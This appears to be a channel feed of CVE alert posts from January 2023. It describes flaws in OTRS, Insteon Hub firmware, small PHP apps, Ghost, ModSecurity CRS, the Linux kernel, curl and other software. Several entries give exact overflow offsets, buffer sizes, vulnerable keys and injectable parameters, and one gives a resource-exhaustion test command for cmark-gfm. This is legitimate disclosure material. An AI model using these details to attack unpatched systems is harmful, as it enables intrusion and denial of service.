🚨 CVE-2019-9892An issue was discovered in Open Ticket Request System (OTRS) 5.x through 5.0.34, 6.x through 6.0.17, and 7.x through 7.0.6. An attacker who is logged into OTRS as an agent user with appropriate permissions may try to import carefully crafted Report Statistics XML that will result in reading of arbitrary files on the OTRS filesystem.🎖@cveNotify |
|
| 2023-01-20 18:29:54 |
🚨 CVE-2017-16328Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_event_alarm, at 0x9d01eb08, the value for the `s_event_offset` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-20 18:29:50 |
🚨 CVE-2017-16329Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_event_alarm, at 0x9d01eb44, the value for the `s_event_delay` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-20 18:29:49 |
🚨 CVE-2017-16330Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_event_alarm, at 0x9d01eb8c, the value for the `s_event_group` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-20 18:29:48 |
🚨 CVE-2019-14464XMFile::read in XMFile.cpp in milkyplay in MilkyTracker 1.02.00 has a heap-based buffer overflow.🎖@cveNotify |
|
| 2023-01-20 18:29:47 |
🚨 CVE-2019-10067An issue was discovered in Open Ticket Request System (OTRS) 7.x through 7.0.6 and Community Edition 5.0.x through 5.0.35 and 6.0.x through 6.0.17. An attacker who is logged into OTRS as an agent user with appropriate permissions may manipulate the URL to cause execution of JavaScript in the context of OTRS.🎖@cveNotify |
|
| 2023-01-20 18:29:43 |
🚨 CVE-2019-11402In Gradle Enterprise before 2018.5.3, Build Cache Nodes did not store the credentials at rest in an encrypted format.🎖@cveNotify |
|
| 2023-01-20 18:29:42 |
🚨 CVE-2018-20669An issue where a provided address with access_ok() is not checked was discovered in i915_gem_execbuffer2_ioctl in drivers/gpu/drm/i915/i915_gem_execbuffer.c in the Linux kernel through 4.19.13. A local attacker can craft a malicious IOCTL function call to overwrite arbitrary kernel memory, resulting in a Denial of Service or privilege escalation.🎖@cveNotify |
|
| 2023-01-20 18:29:41 |
🚨 CVE-2019-20021A heap-based buffer over-read was discovered in canUnpack in p_mach.cpp in UPX 3.95 via a crafted Mach-O file.🎖@cveNotify |
|
| 2023-01-20 16:30:08 |
🚨 CVE-2022-39299Passport-SAML is a SAML 2.0 authentication provider for Passport, the Node.js authentication library. A remote attacker may be able to bypass SAML authentication on a website using passport-saml. A successful attack requires that the attacker is in possession of an arbitrary IDP signed XML element. Depending on the IDP used, fully unauthenticated attacks (e.g without access to a valid user) might also be feasible if generation of a signed message can be triggered. Users should upgrade to passport-saml version 3.2.2 or newer. The issue was also present in the beta releases of `node-saml` before version 4.0.0-beta.5. If you cannot upgrade, disabling SAML authentication may be done as a workaround.🎖@cveNotify |
|
| 2023-01-20 16:30:05 |
🚨 CVE-2022-0742Memory leak in icmp6 implementation in Linux Kernel 5.13+ allows a remote attacker to DoS a host by making it go out-of-memory via icmp6 packets of type 130 or 131. We recommend upgrading past commit 2d3916f3189172d5c69d33065c3c21119fe539fc.🎖@cveNotify |
|
| 2023-01-20 16:30:01 |
🚨 CVE-2022-30331** DISPUTED ** The User-Defined Functions (UDF) feature in TigerGraph 3.6.0 allows installation of a query (in the GSQL query language) without proper validation. Consequently, an attacker can execute arbitrary C++ code. NOTE: the vendor's position is "GSQL was behaving as expected."🎖@cveNotify |
|
| 2023-01-20 16:29:59 |
🚨 CVE-2017-16334Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_event, at 0x9d01edb8, the value for the `s_raw` key is copied using `strcpy` to the buffer at `$sp+0x10`.This buffer is 244 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-20 16:29:58 |
🚨 CVE-2021-39144XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.🎖@cveNotify |
|
| 2023-01-20 16:29:57 |
🚨 CVE-2021-41381Payara Micro Community 5.2021.6 and below allows Directory Traversal.🎖@cveNotify |
|
| 2023-01-20 16:29:56 |
🚨 CVE-2022-39957The OWASP ModSecurity Core Rule Set (CRS) is affected by a response body bypass. A client can issue an HTTP Accept header field containing an optional "charset" parameter in order to receive the response in an encoded form. Depending on the "charset", this response can not be decoded by the web application firewall. A restricted resource, access to which would ordinarily be detected, may therefore bypass detection. The legacy CRS versions 3.0.x and 3.1.x are affected, as well as the currently supported versions 3.2.1 and 3.3.2. Integrators and users are advised to upgrade to 3.2.2 and 3.3.3 respectively.🎖@cveNotify |
|
| 2023-01-20 16:29:55 |
🚨 CVE-2022-39958The OWASP ModSecurity Core Rule Set (CRS) is affected by a response body bypass to sequentially exfiltrate small and undetectable sections of data by repeatedly submitting an HTTP Range header field with a small byte range. A restricted resource, access to which would ordinarily be detected, may be exfiltrated from the backend, despite being protected by a web application firewall that uses CRS. Short subsections of a restricted resource may bypass pattern matching techniques and allow undetected access. The legacy CRS versions 3.0.x and 3.1.x are affected, as well as the currently supported versions 3.2.1 and 3.3.2. Integrators and users are advised to upgrade to 3.2.2 and 3.3.3 respectively and to configure a CRS paranoia level of 3 or higher.🎖@cveNotify |
|
| 2023-01-20 16:29:54 |
🚨 CVE-2017-16332Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_event_alarm, at 0x9d01ec34, the value for the `s_aid` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-20 16:29:53 |
🚨 CVE-2022-39956The OWASP ModSecurity Core Rule Set (CRS) is affected by a partial rule set bypass for HTTP multipart requests by submitting a payload that uses a character encoding scheme via the Content-Type or the deprecated Content-Transfer-Encoding multipart MIME header fields that will not be decoded and inspected by the web application firewall engine and the rule set. The multipart payload will therefore bypass detection. A vulnerable backend that supports these encoding schemes can potentially be exploited. The legacy CRS versions 3.0.x and 3.1.x are affected, as well as the currently supported versions 3.2.1 and 3.3.2. Integrators and users are advised upgrade to 3.2.2 and 3.3.3 respectively. The mitigation against these vulnerabilities depends on the installation of the latest ModSecurity version (v2.9.6 / v3.0.8).🎖@cveNotify |
|
| 2023-01-20 16:29:49 |
🚨 CVE-2021-46848GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.🎖@cveNotify |
|
| 2023-01-20 16:29:48 |
🚨 CVE-2021-37498An SSRF issue was discovered in Reprise License Manager (RLM) web interface through 14.2BL4 that allows remote attackers to trigger outbound requests to intranet servers, conduct port scans via the actserver parameter in License Activation function.🎖@cveNotify |
|
| 2023-01-20 16:29:47 |
🚨 CVE-2021-37499CRLF vulnerability in Reprise License Manager (RLM) web interface through 14.2BL4 in the password parameter in View License Result function, that allows remote attackers to inject arbitrary HTTP headers.🎖@cveNotify |
|
| 2023-01-20 16:29:46 |
🚨 CVE-2021-37500Directory traversal vulnerability in Reprise License Manager (RLM) web interface before 14.2BL4 in the diagnostics function that allows RLM users with sufficient privileges to overwrite any file the on the server.🎖@cveNotify |
|
| 2023-01-20 16:29:45 |
🚨 CVE-2022-20967A vulnerability in the web-based management interface of Cisco Identity Services Engine could allow an authenticated, remote attacker to conduct cross-site scripting attacks against other users of the application web-based management interface. This vulnerability is due to improper validation of input to an application feature before storage within the web-based management interface. An attacker could exploit this vulnerability by creating entries within the application interface that contain malicious HTML or script code. A successful exploit could allow the attacker to store malicious HTML or script code within the application interface for use in further cross-site scripting attacks. Cisco has not yet released software updates that address this vulnerability.🎖@cveNotify |
|
| 2023-01-20 16:29:41 |
🚨 CVE-2022-48191A vulnerability exists in Trend Micro Maximum Security 2022 (17.7) wherein a low-privileged user can write a known malicious executable to a specific location and in the process of removal and restoral an attacker could replace an original folder with a mount point to an arbitrary location, allowing a escalation of privileges on an affected system.🎖@cveNotify |
|
| 2023-01-20 16:29:40 |
🚨 CVE-2023-20020A vulnerability in the Device Management Servlet application of Cisco BroadWorks Application Delivery Platform and Cisco BroadWorks Xtended Services Platform could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper input validation when parsing HTTP requests. An attacker could exploit this vulnerability by sending a sustained stream of crafted requests to an affected device. A successful exploit could allow the attacker to cause all subsequent requests to be dropped, resulting in a DoS condition.🎖@cveNotify |
|
| 2023-01-20 16:29:39 |
🚨 CVE-2022-20966A vulnerability in the web-based management interface of Cisco Identity Services Engine could allow an authenticated, remote attacker to conduct cross-site scripting attacks against other users of the application web-based management interface. This vulnerability is due to improper validation of input to an application feature before storage within the web-based management interface. An attacker could exploit this vulnerability by creating entries within the application interface that contain malicious HTML or script code. A successful exploit could allow the attacker to store malicious HTML or script code within the application interface for use in further cross-site scripting attacks. Cisco has not yet released software updates that address this vulnerability.🎖@cveNotify |
|
| 2023-01-20 16:29:38 |
🚨 CVE-2021-27782HCL BigFix Mobile / Modern Client Management Admin and Config UI passwords can be brute-forced. User should be locked out for multiple invalid attempts.🎖@cveNotify |
|
| 2023-01-20 13:30:15 |
🚨 CVE-2022-2938A flaw was found in the Linux kernel's implementation of Pressure Stall Information. While the feature is disabled by default, it could allow an attacker to crash the system or have other memory-corruption side effects.🎖@cveNotify |
|
| 2023-01-20 13:30:14 |
🚨 CVE-2022-2977A flaw was found in the Linux kernel implementation of proxied virtualized TPM devices. On a system where virtualized TPM devices are configured (this is not the default) a local attacker can create a use-after-free and create a situation where it may be possible to escalate privileges on the system.🎖@cveNotify |
|
| 2023-01-20 13:30:10 |
🚨 CVE-2022-39209cmark-gfm is GitHub's fork of cmark, a CommonMark parsing and rendering library and program in C. In versions prior to 0.29.0.gfm.6 a polynomial time complexity issue in cmark-gfm's autolink extension may lead to unbounded resource exhaustion and subsequent denial of service. Users may verify the patch by running `python3 -c 'print("![l"* 100000 + "\n")' | ./cmark-gfm -e autolink`, which will resource exhaust on unpatched cmark-gfm but render correctly on patched cmark-gfm. This vulnerability has been patched in 0.29.0.gfm.6. Users are advised to upgrade. Users unable to upgrade should disable the use of the autolink extension.🎖@cveNotify |
|
| 2023-01-20 13:30:09 |
🚨 CVE-2021-37498An SSRF issue was discovered in Reprise License Manager (RLM) web interface through 14.2BL4 that allows remote attackers to trigger outbound requests to intranet servers, conduct port scans via the actserver parameter in License Activation function.🎖@cveNotify |
|
| 2023-01-20 13:30:08 |
🚨 CVE-2021-37499CRLF vulnerability in Reprise License Manager (RLM) web interface through 14.2BL4 in the password parameter in View License Result function, that allows remote attackers to inject arbitrary HTTP headers.🎖@cveNotify |
|
| 2023-01-20 13:30:07 |
🚨 CVE-2021-37500Directory traversal vulnerability in Reprise License Manager (RLM) web interface before 14.2BL4 in the diagnostics function that allows RLM users with sufficient privileges to overwrite any file the on the server.🎖@cveNotify |
|
| 2023-01-20 11:30:13 |
🚨 CVE-2022-39186EXFO - BV-10 Performance Endpoint Unit misconfiguration. System configuration file has misconfigured permissions🎖@cveNotify |
|
| 2023-01-20 11:30:12 |
🚨 CVE-2022-4616The webserver in Delta DX-3021 versions prior to 1.24 is vulnerable to command injection through the network diagnosis page. This vulnerability could allow a remote unauthenticated user to add files, delete files, and change file permissions.🎖@cveNotify |
|
| 2023-01-20 11:30:11 |
🚨 CVE-2022-45729A cross-site scripting (XSS) vulnerability in Doctor Appointment Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Employee ID parameter.🎖@cveNotify |
|
| 2023-01-20 11:30:10 |
🚨 CVE-2022-46623Judging Management System v1.0.0 was discovered to contain a SQL injection vulnerability via the username parameter.🎖@cveNotify |
|
| 2023-01-20 11:30:06 |
🚨 CVE-2022-43591A buffer overflow vulnerability exists in the QML QtScript Reflect API of Qt Project Qt 6.3.2. A specially-crafted javascript code can trigger an out-of-bounds memory access, which can lead to arbitrary code execution. Target application would need to access a malicious web page to trigger this vulnerability.🎖@cveNotify |
|
| 2023-01-20 11:30:05 |
🚨 CVE-2023-0288Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1189.🎖@cveNotify |
|
| 2023-01-20 11:30:04 |
🚨 CVE-2022-48251** DISPUTED ** The AES instructions on the ARMv8 platform do not have an algorithm that is "intrinsically resistant" to side-channel attacks. NOTE: the vendor reportedly offers the position "while power side channel attacks ... are possible, they are not directly caused by or related to the Arm architecture."🎖@cveNotify |
|
| 2023-01-20 11:30:03 |
🚨 CVE-2022-46946Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_brand.🎖@cveNotify |
|
| 2023-01-20 11:29:59 |
🚨 CVE-2022-46947Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_category.🎖@cveNotify |
|
| 2023-01-20 11:29:58 |
🚨 CVE-2022-46949Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_helmet.🎖@cveNotify |
|
| 2023-01-20 11:29:57 |
🚨 CVE-2022-46951Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_uploads.🎖@cveNotify |
|
| 2023-01-20 11:29:53 |
🚨 CVE-2022-46952Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_user.🎖@cveNotify |
|
| 2023-01-20 11:29:52 |
🚨 CVE-2022-46953Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=save_window.🎖@cveNotify |
|
| 2023-01-20 11:29:51 |
🚨 CVE-2022-46955Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=save_queue.🎖@cveNotify |
|
| 2023-01-20 11:29:50 |
🚨 CVE-2022-46956Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/manage_user.php.🎖@cveNotify |
|
| 2023-01-20 07:30:07 |
🚨 CVE-2022-2526A use-after-free vulnerability was found in systemd. This issue occurs due to the on_stream_io() function and dns_stream_complete() function in 'resolved-dns-stream.c' not incrementing the reference counting for the DnsStream object. Therefore, other functions and callbacks called can dereference the DNSStream object, causing the use-after-free when the reference is still used later.🎖@cveNotify |
|
| 2023-01-20 07:30:06 |
🚨 CVE-2023-22331Use of default credentials vulnerability in CONPROSYS HMI System (CHS) Ver.3.4.5 and earlier allows a remote unauthenticated attacker to alter user credentials information.🎖@cveNotify |
|
| 2023-01-20 07:30:05 |
🚨 CVE-2023-22334Use of password hash instead of password for authentication vulnerability in CONPROSYS HMI System (CHS) Ver.3.4.5 and earlier allows a remote authenticated attacker to obtain user credentials information via a man-in-the-middle attack.🎖@cveNotify |
|
| 2023-01-20 07:30:04 |
🚨 CVE-2023-22339Improper access control vulnerability in CONPROSYS HMI System (CHS) Ver.3.4.5 and earlier allows a remote unauthenticated attacker to bypass access restriction and obtain the server certificate including the private key of the product.🎖@cveNotify |
|
| 2023-01-20 07:30:00 |
🚨 CVE-2023-22373Cross-site scripting vulnerability in CONPROSYS HMI System (CHS) Ver.3.4.5 and earlier allows a remote authenticated attacker to inject an arbitrary script and obtain the sensitive information.🎖@cveNotify |
|
| 2023-01-20 07:29:59 |
🚨 CVE-2022-25765The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.🎖@cveNotify |
|
| 2023-01-20 07:29:58 |
🚨 CVE-2016-1033Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, and CVE-2016-1032.🎖@cveNotify |
|
| 2023-01-20 07:29:57 |
🚨 CVE-2016-4153Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.🎖@cveNotify |
|
| 2023-01-20 07:29:53 |
🚨 CVE-2022-3239A flaw use after free in the Linux kernel video4linux driver was found in the way user triggers em28xx_usb_probe() for the Empia 28xx based TV cards. A local user could use this flaw to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-01-20 07:29:52 |
🚨 CVE-2014-9428The batadv_frag_merge_packets function in net/batman-adv/fragmentation.c in the B.A.T.M.A.N. implementation in the Linux kernel through 3.18.1 uses an incorrect length field during a calculation of an amount of memory, which allows remote attackers to cause a denial of service (mesh-node system crash) via fragmented packets.🎖@cveNotify |
|
| 2023-01-20 07:29:51 |
🚨 CVE-2022-32036Tenda M3 V1.0.0.12 was discovered to contain multiple stack overflow vulnerabilities via the ssidList, storeName, and trademark parameters in the function formSetStoreWeb.🎖@cveNotify |
|
| 2023-01-20 07:29:50 |
🚨 CVE-2022-32034Tenda M3 V1.0.0.12 was discovered to contain a stack overflow via the items parameter in the function formdelMasteraclist.🎖@cveNotify |
|
| 2023-01-20 07:29:46 |
🚨 CVE-2016-4177Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (stack memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4176.🎖@cveNotify |
|
| 2023-01-20 07:29:45 |
🚨 CVE-2016-4176Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (stack memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4177.🎖@cveNotify |
|
| 2023-01-20 07:29:44 |
🚨 CVE-2016-4178Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors.🎖@cveNotify |
|
| 2023-01-20 07:29:43 |
🚨 CVE-2022-42915curl before 7.86.0 has a double free. If curl is told to use an HTTP proxy for a transfer with a non-HTTP(S) URL, it sets up the connection to the remote server by issuing a CONNECT request to the proxy, and then tunnels the rest of the protocol through. An HTTP proxy might refuse this request (HTTP proxies often only allow outgoing connections to specific port numbers, like 443 for HTTPS) and instead return a non-200 status code to the client. Due to flaws in the error/cleanup handling, this could trigger a double free in curl if one of the following schemes were used in the URL for the transfer: dict, gopher, gophers, ldap, ldaps, rtmp, rtmps, or telnet. The earliest affected version is 7.77.0.🎖@cveNotify |
|
| 2023-01-20 01:29:38 |
🚨 CVE-2017-16259Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_auth, at 0x9d015430, the value for the `usr` key is copied using `strcpy` to the buffer at `$sp+0x290`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-20 01:29:37 |
🚨 CVE-2022-46476D-Link DIR-859 A1 1.05 was discovered to contain a command injection vulnerability via the service= variable in the soapcgi_main function.🎖@cveNotify |
|
| 2023-01-20 01:29:36 |
🚨 CVE-2022-3704** DISPUTED ** A vulnerability classified as problematic has been found in Ruby on Rails. This affects an unknown part of the file actionpack/lib/action_dispatch/middleware/templates/routes/_table.html.erb. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The real existence of this vulnerability is still doubted at the moment. The name of the patch is be177e4566747b73ff63fd5f529fab564e475ed4. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-212319. NOTE: Maintainer declares that there isn’t a valid attack vector. The issue was wrongly reported as a security vulnerability by a non-member of the Rails team.🎖@cveNotify |
|
| 2023-01-20 00:30:04 |
🚨 CVE-2022-47195An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.A stored XSS vulnerability exists in the `facebook` field for a user.🎖@cveNotify |
|
| 2023-01-20 00:30:03 |
🚨 CVE-2022-47196An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.A stored XSS vulnerability exists in the `codeinjection_head` for a post.🎖@cveNotify |
|
| 2023-01-20 00:30:02 |
🚨 CVE-2022-47197An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.A stored XSS vulnerability exists in the `codeinjection_foot` for a post.🎖@cveNotify |
|
| 2023-01-20 00:30:01 |
🚨 CVE-2022-47740Seltmann GmbH Content Management System 6 is vulnerable to SQL Injection via /index.php.🎖@cveNotify |
|
| 2023-01-20 00:30:00 |
🚨 CVE-2022-47745ZenTao 16.4 to 18.0.beta1 is vulnerable to SQL injection. After logging in with any user, you can complete SQL injection by constructing a special request and sending it to function importNotice.🎖@cveNotify |
|
| 2023-01-20 00:29:56 |
🚨 CVE-2023-0406Cross-Site Request Forgery (CSRF) in GitHub repository modoboa/modoboa prior to 2.0.4.🎖@cveNotify |
|
| 2023-01-20 00:29:55 |
🚨 CVE-2022-4344Memory exhaustion in the Kafka protocol dissector in Wireshark 4.0.0 to 4.0.1 and 3.6.0 to 3.6.9 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-01-20 00:29:54 |
🚨 CVE-2017-16320Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_sonos, at 0x9d01ddd4, the value for the `s_sonos_cmd` key is copied using `strcpy` to the buffer at `$sp+0x290`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-20 00:29:53 |
🚨 CVE-2017-16318Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_sonos, at 0x9d01d16c, the value for the `g_group_off` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-20 00:29:52 |
🚨 CVE-2017-16319Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_sonos, at 0x9d01d7a8, the value for the `g_sonos_index` key is copied using `strcpy` to the buffer at `$sp+0x1b4`.This buffer is 8 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-20 00:29:48 |
🚨 CVE-2017-16317Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_sonos, at 0x9d01d068, the value for the `g_group` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-20 00:29:47 |
🚨 CVE-2017-16315Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_sonos, at 0x9d01c3a0, the value for the `s_state` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-20 00:29:46 |
🚨 CVE-2017-16316Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_sonos, at 0x9d01c898, the value for the `g_meta_page` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-20 00:29:45 |
🚨 CVE-2017-16313Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_sonos, at 0x9d01c084, the value for the `s_ddelay` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-20 00:29:44 |
🚨 CVE-2017-16314Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_sonos, at 0x9d01c1cc, the value for the `s_speaker` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-20 00:29:40 |
🚨 CVE-2017-16321Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_sonos, at 0x9d01e050, the value for the `s_sonos_index` key is copied using `strcpy` to the buffer at `$sp+0x1b4`.This buffer is 8 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-20 00:29:39 |
🚨 CVE-2017-16308Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd sn_exw, at 0x9d01b374, the value for the `cmd2` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-20 00:29:38 |
🚨 CVE-2017-16305Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd sn_exw, at 0x9d01b20c, the value for the `id` key is copied using `strcpy` to the buffer at `$sp+0x290`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-20 00:29:37 |
🚨 CVE-2017-16306Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd sn_exw, at 0x9d01b2ac, the value for the `flg` key is copied using `strcpy` to the buffer at `$sp+0x280`.This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-20 00:29:36 |
